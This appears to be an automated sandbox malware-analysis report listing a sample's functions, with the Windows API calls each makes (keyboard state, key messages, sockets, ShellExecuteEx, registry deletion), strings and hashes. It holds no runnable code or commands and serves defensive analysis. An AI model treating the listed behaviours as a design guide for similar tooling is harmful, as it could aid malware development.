Opcode ID: fa41e5fb619462704892d89d41f5d4236ee96f5d260ea8ce81b2493e136e0e2f
Instruction ID: c6e46cc59ec55f711d8c53c1b05b23d7704d07fd8f7fd3793c1c5aa533a5f23d
Opcode Fuzzy Hash: fa41e5fb619462704892d89d41f5d4236ee96f5d260ea8ce81b2493e136e0e2f
Instruction Fuzzy Hash: 64014FF6900208BFE750A7A09D89EE7777CE708301F4005A9BB49E6451EA749EC68B70

Function 000F2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 000F2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000,000000FF), ref: 000F2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 0012C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 0012C4D6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: c6a2e82cee354fcd88434815d4faa87e867272e2b981e19fae1418b9eaf21e12
Instruction ID: fa58281a515144e52942e3eacb19ef9f2e07fe3d1026dfd9ed9f1b505223e4b8
Opcode Fuzzy Hash: c6a2e82cee354fcd88434815d4faa87e867272e2b981e19fae1418b9eaf21e12
Instruction Fuzzy Hash: 05411730208AC89BC7799B29DCA877F7BE2AB95300F15841DE34B86D60C7759882E752

Function 00157368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0015737F

Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001573B6
EnterCriticalSection.KERNEL32(?), ref: 001573D2
_memmove.LIBCMT ref: 00157420
_memmove.LIBCMT ref: 0015743D
LeaveCriticalSection.KERNEL32(?), ref: 0015744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00157461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00157480

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: fd8682635d4b158367d35251a304e2cc4b0c6c9764b7292a580e2e0020bd0720
Instruction ID: 4f0b4093335a0edf5f12afd36ebce2aae9dbabe2f6893d5eb18dd1400f49320f
Opcode Fuzzy Hash: fd8682635d4b158367d35251a304e2cc4b0c6c9764b7292a580e2e0020bd0720
Instruction Fuzzy Hash: BE316E31D04205EBCB10DF64DC86AAFBB78FF49710B1441B9FD049B246DB709A95CBA0

Function 0014C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0014C087
_memcmp.LIBCMT ref: 0014C0A9
_memcmp.LIBCMT ref: 0014C0C1
_memcmp.LIBCMT ref: 0014C0D4
_memcmp.LIBCMT ref: 0014C0EE
_memcmp.LIBCMT ref: 0014C101
_memcmp.LIBCMT ref: 0014C119
_memcmp.LIBCMT ref: 0014C134

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 095fff11e4d44caf0d9b99ba9ff37789a3974519f938803077c1eb3ef88fbcfb
Instruction ID: 21e790a57bf192bcfa9f5019e67bb4624b833b1d8ca69ad632e325b2bb88fe5e
Opcode Fuzzy Hash: 095fff11e4d44caf0d9b99ba9ff37789a3974519f938803077c1eb3ef88fbcfb
Instruction Fuzzy Hash: 4021A475B02205BBD699B5218D42FFB779CAF307A4B084030FE05972A2E7A2DE11C6E5

Function 0015ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9

_wcstok.LIBCMT ref: 0015EEFF
_wcscpy.LIBCMT ref: 0015EF8E
_memset.LIBCMT ref: 0015EFC1

Strings

X, xrefs: 0015EFFE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 82201f63532bada62ff726e9cce873b4cd499198acc624c887d5c727dedc77e8
Instruction ID: 5aef2d3b7bcc3b463ba4447efe5ed056693c48272df06b80b6324bc8306322e8
Opcode Fuzzy Hash: 82201f63532bada62ff726e9cce873b4cd499198acc624c887d5c727dedc77e8
Instruction Fuzzy Hash: 54C16071508704DFC714EF24C881AAAB7E4EF85310F14492DF9A99B6A2DB70ED49DB82

Function 00166E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00166F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00166F35
WSAGetLastError.WSOCK32(00000000), ref: 00166F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00166FFE
inet_ntoa.WSOCK32(?), ref: 00166FBB

Part of subcall function 0014AE14: _strlen.LIBCMT ref: 0014AE1E
Part of subcall function 0014AE14: _memmove.LIBCMT ref: 0014AE40

_strlen.LIBCMT ref: 00167058
_memmove.LIBCMT ref: 001670C1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 08ef0c7bf87c9ed8ae2a675e3448ea7e378613c25515690b7efb2004362a10f6
Instruction ID: 1010986a127ed3aa7efd11dc3fbf36ba40cce9f721519dbee6f90fd47afa74f0
Opcode Fuzzy Hash: 08ef0c7bf87c9ed8ae2a675e3448ea7e378613c25515690b7efb2004362a10f6
Instruction Fuzzy Hash: E781E131508304ABD714EF24CC82FBBB7A9AF84718F14491CF6159B2E2DB71AD41CBA2

Function 000F1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba37319a23af34aad72c1411d9fe2538408dfa8a7f1f3776b95d3795f378799
Instruction ID: dc22dd030c9a3901695ecf6980081281eb93f06160fe51c4301cfe5c75e775cf
Opcode Fuzzy Hash: 3ba37319a23af34aad72c1411d9fe2538408dfa8a7f1f3776b95d3795f378799
Instruction Fuzzy Hash: AF717B70904119EFCB14CF98CC88AFEBBB9FF85314F108159FA15AA651C734AA52DBA0

Function 0016F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0016F75C
_memset.LIBCMT ref: 0016F825
ShellExecuteExW.SHELL32(?), ref: 0016F86A

Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C

Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9

GetProcessId.KERNEL32(00000000), ref: 0016F8E1
CloseHandle.KERNEL32(00000000), ref: 0016F910

Strings

@, xrefs: 0016F839

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 25d2b486ef299b1ef71b681700fcc68bb0d2120d3493c5c735f085a3d34484c3
Instruction ID: d657bd50a817aac3a21dba114ea486ab79670d4beb8e4f2ac2a7d363d4e83a44
Opcode Fuzzy Hash: 25d2b486ef299b1ef71b681700fcc68bb0d2120d3493c5c735f085a3d34484c3
Instruction Fuzzy Hash: 4261BE75A00619DFCF14EF54D880AAEBBF5FF48310B15846DE84AAB752CB30AD52CB90

Function 0015145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0015149C
GetKeyboardState.USER32(?), ref: 001514B1
SetKeyboardState.USER32(?), ref: 00151512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00151540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0015155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 001515A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 001515C8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 993edbe01a2218f55ffedd243192d28f1e5b4fba8a9bf2c2d3f04a392b6ce18d
Instruction ID: 805bbcc7e80c6d5f91ab078eae3f5f02eac49b11de9d2657fd1836f80d401e59
Opcode Fuzzy Hash: 993edbe01a2218f55ffedd243192d28f1e5b4fba8a9bf2c2d3f04a392b6ce18d
Instruction Fuzzy Hash: 8E5102A06143D5BEFB335234CC45BBA7EA95B46306F088589E9E54D8C2D3E4DCC8D750

Function 00151276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001512B5
GetKeyboardState.USER32(?), ref: 001512CA
SetKeyboardState.USER32(?), ref: 0015132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00151357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00151374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001513B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001513D9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 7d4de2e3996caf107023d88ca317e678cb2601edcd65ed48d5a0946d17553c90
Instruction ID: b602bb6843df4a0efef660b37f62c320150b59f583aae48ace538efd8489cfff
Opcode Fuzzy Hash: 7d4de2e3996caf107023d88ca317e678cb2601edcd65ed48d5a0946d17553c90
Instruction Fuzzy Hash: D35115A05446D5BDFB3387248C55BBA7FA96B06312F088489E9F84ECC2D394AC8CD750

Function 0015589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 001558AC
_wcsncpy.LIBCMT ref: 001558E1
_wcsncpy.LIBCMT ref: 00155913
_wcsncpy.LIBCMT ref: 00155946
_wcsncpy.LIBCMT ref: 00155988
_wcsncpy.LIBCMT ref: 001559C2
_wcsncpy.LIBCMT ref: 001559F1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: c0fa02b28b1891a036ba8af794f7c64d9916b4ef88560d90ff7bfcb63aca7849
Instruction ID: 91d59e9ea690d263f25c75b9452ff98c3f90c241eb8d6afa8ad0ebbcca0a4a71
Opcode Fuzzy Hash: c0fa02b28b1891a036ba8af794f7c64d9916b4ef88560d90ff7bfcb63aca7849
Instruction Fuzzy Hash: E041C465C20128B6CB14FBF48C869CFB3A89F15710F508462F928E3121F734E794C7A5

Function 0017A2C5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

@U=u, xrefs: 0017A3BE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 5ad15b2e8eeead99e7ab95fa782b9f04a0d792f83acd84af88c1ca77775a17a9
Instruction ID: 406efbc73687b24c7fe4f63716e3591b651dbad81b9651dcc44e1ecf1ee82020
Opcode Fuzzy Hash: 5ad15b2e8eeead99e7ab95fa782b9f04a0d792f83acd84af88c1ca77775a17a9
Instruction Fuzzy Hash: D341E235900204ABC714DF28CC88BADBBB4FF89310F998165F95EA72E1C770AD81DA51

Function 001538AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001538D3,?), ref: 001548C7

Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001538D3,?), ref: 001548E0

lstrcmpiW.KERNEL32(?,?), ref: 001538F3
_wcscmp.LIBCMT ref: 0015390F
MoveFileW.KERNEL32(?,?), ref: 00153927
_wcscat.LIBCMT ref: 0015396F
SHFileOperationW.SHELL32(?), ref: 001539DB

Strings

\*.*, xrefs: 00153969

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: cf5625970032141de8b0bacaeff23fcc747207018ec5c52fde51b79ac2605699
Instruction ID: 7e174b5ac4a0251594cd3350d3bab7da26764a36e34747dfc51a00f759d97c97
Opcode Fuzzy Hash: cf5625970032141de8b0bacaeff23fcc747207018ec5c52fde51b79ac2605699
Instruction Fuzzy Hash: E4417EB140C3849EC755EF64C4819EFB7E8AF98385F00192EB8AAC7151EB74D69CC752

Function 00177500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00177519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001775C0
IsMenu.USER32(?), ref: 001775D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00177620
DrawMenuBar.USER32 ref: 00177633

Strings

0, xrefs: 0017750D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1af526db51e930fcfaee582c7a6698a76e54e39d01cda3bafa50f58a267a1b65
Instruction ID: 272d712f10a712f5e746f591f3d2c5b51ea2eab26c63379d42878a1a2b8e3f8d
Opcode Fuzzy Hash: 1af526db51e930fcfaee582c7a6698a76e54e39d01cda3bafa50f58a267a1b65
Instruction Fuzzy Hash: 61411A75A04609EFDB10DF54D884E9ABBF9FF08314F048129FA5997290D730AD91CF90

Function 0017122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0017125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00171286
FreeLibrary.KERNEL32(00000000), ref: 0017133D

Part of subcall function 0017122D: RegCloseKey.ADVAPI32(?), ref: 001712A3
Part of subcall function 0017122D: FreeLibrary.KERNEL32(?), ref: 001712F5
Part of subcall function 0017122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00171318

RegDeleteKeyW.ADVAPI32(?,?), ref: 001712E0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: db174a98bc48f23d20c73c0900ef7ce69ed21be34a11ca7d82e0f17cbdfed55f
Instruction ID: 191a75863c081a074a5eaa609148ded887dd8d4188662ccffbe1d9393368dd74
Opcode Fuzzy Hash: db174a98bc48f23d20c73c0900ef7ce69ed21be34a11ca7d82e0f17cbdfed55f
Instruction Fuzzy Hash: 37314BB1901109BFDB14DB94DC89AFFB7BCFF08350F104169F509E2641EB749E859AA0

Function 00166486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001680A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001680CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001664D9
WSAGetLastError.WSOCK32(00000000), ref: 001664E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00166521
connect.WSOCK32(00000000,?,00000010), ref: 0016652A
WSAGetLastError.WSOCK32 ref: 00166534
closesocket.WSOCK32(00000000), ref: 0016655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00166576

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: cb2f3be8f7e27c636e4620d50e5ce8c0d8550bb8cb96e4291d150266a241ab4a
Instruction ID: 8437455de1f848cf38ca93a37da46d2814461a800b4868c60fec5f8a5efe9a43
Opcode Fuzzy Hash: cb2f3be8f7e27c636e4620d50e5ce8c0d8550bb8cb96e4291d150266a241ab4a
Instruction Fuzzy Hash: BD31AF31600218AFDB10AF24DC85BBE7BBCEB45754F048029F90AD7291CB70AD95CBA2

Function 00149372 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82

Part of subcall function 0014B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0014B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001493F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00149409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00149439

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Strings

ListBox, xrefs: 001493B5
@U=u, xrefs: 001493F6, 00149409, 00149439
ComboBox, xrefs: 00149380

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: @U=u$ComboBox$ListBox
API String ID: 365058703-2258501812
Opcode ID: 2d98973b544de2fe4a44f4a68100e437ee5deb0923e5efd7144ab2ef1767629d
Instruction ID: 12834d7497f57239712c3ae63e68cdebbfb64abf0d9e49c631d2550d99762969
Opcode Fuzzy Hash: 2d98973b544de2fe4a44f4a68100e437ee5deb0923e5efd7144ab2ef1767629d
Instruction Fuzzy Hash: 7521E471D40108BBDB18AB74DC868FFB778EF05360B144129FA29971F1DB354D4A9650

Function 0014E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0014E120
SysAllocString.OLEAUT32(00000000), ref: 0014E123
SysAllocString.OLEAUT32 ref: 0014E144
SysFreeString.OLEAUT32 ref: 0014E14D
